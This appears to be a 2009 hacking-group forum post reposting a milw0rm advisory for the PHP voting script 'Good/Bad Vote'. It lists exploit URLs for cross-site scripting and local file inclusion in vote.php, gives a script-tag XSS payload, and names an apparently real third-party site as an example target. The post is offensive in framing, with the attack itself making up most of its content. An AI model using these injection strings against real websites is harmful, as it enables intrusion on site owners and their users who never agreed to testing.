Multi Ethnic Hacking Group


    Good/Bad Vote (XSS/LFI) Multiple Remote Vulnerabilities

    Share

    Foxi
    Admin

    Posts : 92
    Reputation : -1
    Join date : 2009-07-08

    Good/Bad Vote (XSS/LFI) Multiple Remote Vulnerabilities

    Post by Foxi on Thu Jul 23, 2009 4:22 am

    Code:
    ###########################################################################
    #-----------------------------I AM MUSLIM !!------------------------------#
    ###########################################################################

    ==============================================================================
                          _      _      _          _      _  _
                        / \    | |    | |        / \    | | | |
                        / _ \  | |    | |      / _ \  | |_| |
                      / ___ \  | |___  | |___  / ___ \  |  _  |
      IN THE NAME OF /_/  \_\ |_____| |_____| /_/  \_\ |_| |_|
                                                               

    ==============================================================================
            [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
    ==============================================================================
            [»] Good/Bad Vote (XSS/LFI) Vulnerability
    ==============================================================================

       [»] script:            [ Good/Bad Vote ]
       [»] Language:          [ PHP ]
            [»] Download:          [ http://www.scriptsez.net/index.php?action=details&cat=Polls%20and%20Voting&id=1086552418  ]
       [»] Founder:            [ Moudi <m0udi@9.cn> ]
            [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man...]
            [»] Team:              [ EvilWay ]
            [»] Dork:              [ OFF ]
            [»] Price:              [ 6 US $ ]

    ###########################################################################

    ===[ Exploit XSS vulnerability ]===   
       
       [»] http://www.site.com/patch/vote.php?action=vote&id=[XSS]&ficdest=0%2Edat&midcast=0%2Etxt

            [»] http://searchall.iwebland.com:80/sigs/vote.php?action=vote&id=[XSS]&ficdest=0%2Edat&midcast=0%2Etxt
                XSS TO ADD: 1<script>alert(314154736094)</script>
             
    ===[ Exploit LFI ]===

          [»] http://www.site.com/patch/vote.php?action=dovote&id=[LFI]&ficdest=.dat&midcast=.txt

    Author: Moudi

    ###########################################################################

    # milw0rm.com [2009-07-17]


      Current date/time is Tue Feb 28, 2017 9:43 am